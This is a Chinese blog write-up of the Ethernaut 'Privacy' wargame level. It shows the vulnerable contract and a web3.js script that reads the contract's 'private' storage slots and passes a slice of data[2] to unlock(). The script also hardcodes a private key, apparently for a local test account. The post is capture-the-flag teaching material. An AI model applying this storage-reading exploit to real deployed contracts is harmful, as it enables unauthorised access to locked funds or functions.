blockchain | ethernaut 12 Privacy

blockchain | ethernaut 12 Privacy

这关考察private变量读取和转换。
合约:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Privacy {

  bool public locked = true;
  uint256 public ID = block.timestamp;
  uint8 private flattening = 10;
  uint8 private denomination = 255;
  uint16 private awkwardness = uint16(block.timestamp);
  bytes32[3] private data;

  constructor(bytes32[3] memory _data) {
    data = _data;
  }
  
  function unlock(bytes16 _key) public {
    require(_key == bytes16(data[2]));
    locked = false;
  }

  /*
    A bunch of super advanced solidity algorithms...

      ,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`
      .,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,
      *.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^         ,---/V\
      `*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.    ~|__(o.o)
      ^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'  UU  UU
  */
}

直接写交互脚本:
exp:

const Web3 = require('web3');
const fs = require('fs');
const deploy = require('./Deploy.js');   // 导入部署模块

const rpcURL = 'http://127.0.0.1:8545';
//const addr = '0xda8e0A6Becd46E3C1d25BEbcc0E8f6723Cf2F924';
const web3 = new Web3.Web3(rpcURL);    // 链接网络节点

const privateKey = '0x957c03cef7400defc7585d5dd81c48455557aa29c12c627ad0fd17d73effe696';
web3.eth.accounts.wallet.add(privateKey);
const wallet = web3.eth.accounts.wallet[0];
console.log(wallet)

let exp = async function(){
	console.log("Present balance: "+await web3.eth.getBalance(wallet.address));
	let aim_contract_addr = "0x4Bd2Df282d13b6053eda0F8bdA937040bE44a63b";
	// 读一手数据
	let data = await web3.eth.getStorageAt(aim_contract_addr, 0);
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 1);
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 2);
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 3);   // data[0]
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 4);   // data[1]
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 5);   // data[2]
	console.log(data);
	data = await web3.eth.getStorageAt(aim_contract_addr, 6);
	console.log(data);

	let jsonabi = JSON.parse(fs.readFileSync('contracts/Privacy.json', 'utf8')).abi
	var contract = new web3.eth.Contract(jsonabi, aim_contract_addr, {
	    from: wallet.address
	});
	// 这里写的是上面读的结果,web3.js好像没有合适的直接转化的方法,就手动裁剪了。
	//0xd1c72d0bf2df90d6f032081e28fc2138   0x3c1be63d20c532f36adb63c1b7a058a3
	let ret = await contract.methods.unlock("0xd1c72d0bf2df90d6f032081e28fc2138").send({
		from: wallet.address,
		gas: 1000000,
		gasPrice: 10000000000,
	});

	console.log(ret);
}

exp();
posted @ 2023-09-06 16:39  Mz1  阅读(23)  评论(0编辑  收藏  举报